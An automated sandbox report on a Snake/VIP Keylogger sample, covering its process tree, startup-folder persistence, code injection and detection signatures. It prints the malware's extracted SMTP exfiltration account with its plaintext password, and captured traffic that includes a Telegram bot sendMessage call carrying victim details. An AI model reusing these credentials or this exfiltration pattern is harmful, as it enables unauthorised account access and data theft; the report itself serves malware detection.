Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
B7N48hmO78.exe

Overview

General Information

Sample name:B7N48hmO78.exe
renamed because original name is a hash value
Original sample name:3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8.exe
Analysis ID:1587603
MD5:80a64f0b8df55d637e135f0eb4fb6b70
SHA1:f491fc184d0f15d789e81577e47446478c10ed53
SHA256:3fc9afa49fa31f495a7792c38b6087609438625ec5073383483d7d1411c7cec8
Tags:exeuser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • B7N48hmO78.exe (PID: 1812 cmdline: "C:\Users\user\Desktop\B7N48hmO78.exe" MD5: 80A64F0B8DF55D637E135F0EB4FB6B70)
    • demonetised.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\B7N48hmO78.exe" MD5: 80A64F0B8DF55D637E135F0EB4FB6B70)
      • svchost.exe (PID: 2684 cmdline: "C:\Users\user\Desktop\B7N48hmO78.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 6176 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • demonetised.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Local\inhumate\demonetised.exe" MD5: 80A64F0B8DF55D637E135F0EB4FB6B70)
      • svchost.exe (PID: 6572 cmdline: "C:\Users\user\AppData\Local\inhumate\demonetised.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x361a0:$a1: get_encryptedPassword
          • 0x36174:$a2: get_encryptedUsername
          • 0x36238:$a3: get_timePasswordChanged
          • 0x36150:$a4: get_passwordField
          • 0x361b6:$a5: set_encryptedPassword
          • 0x35f83:$a7: get_logins
          • 0x3185f:$a10: KeyLoggerEventArgs
          • 0x3182e:$a11: KeyLoggerEventArgsEventHandler
          • 0x36057:$a13: _encryptedPassword
          Click to see the 61 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.svchost.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 28 88 44 24 2B 88 44 24 2F B0 0E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          6.3.svchost.exe.305df20.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.3.svchost.exe.305df20.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              6.3.svchost.exe.305df20.0.raw.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                6.3.svchost.exe.305df20.0.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  Click to see the 157 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , ProcessId: 6176, ProcessName: wscript.exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ParentImage: C:\Users\user\AppData\Local\inhumate\demonetised.exe, ParentProcessId: 6488, ParentProcessName: demonetised.exe, ProcessCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ProcessId: 2684, ProcessName: svchost.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs" , ProcessId: 6176, ProcessName: wscript.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ParentImage: C:\Users\user\AppData\Local\inhumate\demonetised.exe, ParentProcessId: 6488, ParentProcessName: demonetised.exe, ProcessCommandLine: "C:\Users\user\Desktop\B7N48hmO78.exe", ProcessId: 2684, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\inhumate\demonetised.exe, ProcessId: 6488, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T15:33:44.402670+010028033053Unknown Traffic192.168.2.549706104.21.32.1443TCP
                  2025-01-10T15:33:47.086336+010028033053Unknown Traffic192.168.2.549710104.21.32.1443TCP
                  2025-01-10T15:33:48.381258+010028033053Unknown Traffic192.168.2.549712104.21.32.1443TCP
                  2025-01-10T15:33:51.020949+010028033053Unknown Traffic192.168.2.549716104.21.32.1443TCP
                  2025-01-10T15:33:52.334346+010028033053Unknown Traffic192.168.2.549718104.21.32.1443TCP
                  2025-01-10T15:33:56.258742+010028033053Unknown Traffic192.168.2.549732104.21.32.1443TCP
                  2025-01-10T15:33:57.606888+010028033053Unknown Traffic192.168.2.549744104.21.32.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T15:33:42.225455+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                  2025-01-10T15:33:43.772377+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
                  2025-01-10T15:33:45.147400+010028032742Potentially Bad Traffic192.168.2.549707132.226.247.7380TCP
                  2025-01-10T15:33:53.819335+010028032742Potentially Bad Traffic192.168.2.549720132.226.247.7380TCP
                  2025-01-10T15:33:55.694292+010028032742Potentially Bad Traffic192.168.2.549720132.226.247.7380TCP
                  2025-01-10T15:33:57.024547+010028032742Potentially Bad Traffic192.168.2.549739132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T15:33:54.590569+010018100071Potentially Bad Traffic192.168.2.549722149.154.167.220443TCP
                  2025-01-10T15:34:06.345035+010018100071Potentially Bad Traffic192.168.2.549812149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587", "Version": "4.4"}
                  Source: 6.2.svchost.exe.7b00000.4.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "contabilidad@daipro.com.mx", "Password": "DAIpro123**", "Host": "mail.daipro.com.mx", "Port": "587"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeReversingLabs: Detection: 79%
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeVirustotal: Detection: 73%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: B7N48hmO78.exeVirustotal: Detection: 73%Perma Link
                  Source: B7N48hmO78.exeReversingLabs: Detection: 79%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: B7N48hmO78.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: B7N48hmO78.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49725 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49812 version: TLS 1.2
                  Source: Binary string: _.pdb source: svchost.exe, 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4523514268.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: demonetised.exe, 00000002.00000003.2085085714.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000002.00000003.2085935423.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2202790607.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, demonetised.exe, 00000005.00000003.2203800929.0000000004060000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E26CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E26CA9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00E260DD
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00E263F9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E2EB60
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00E2F5FA
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2F56F FindFirstFileW,FindClose,0_2_00E2F56F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E31B2F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E31C8A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00E31F94
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D66CA9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00D660DD
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00D663F9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D6EB60
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D6F5FA
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D6F56F FindFirstFileW,FindClose,2_2_00D6F56F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71B2F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71C8A
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D71F94
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AE534h3_2_081AE288
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_081A0856
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_081A0040
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AFAECh3_2_081AF840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081ACF7Ch3_2_081ACCD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081A3206h3_2_081A3134
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AD3D4h3_2_081AD128
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081A2834h3_2_081A2580
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AD82Ch3_2_081AD580
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081ADC84h3_2_081AD9D8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081A3206h3_2_081A2DE8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081A3206h3_2_081A2DE3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AE0DCh3_2_081ADE30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_081A0676
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AE98Ch3_2_081AE6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AEDE4h3_2_081AEB38
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081A0D10h3_2_081A0B30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081A169Ah3_2_081A0B30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AF23Ch3_2_081AEF90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 081AF694h3_2_081AF3E8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49722 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49812 -> 149.154.167.220:443
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.32.1 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 132.226.247.73 80Jump to behavior
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7c40000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305e000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.svchost.exe.305d000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.7970000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.svchost.exe.305ef20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.7740f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.2088626082.000000000305E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4531386430.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.4530130274.0000000007970000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
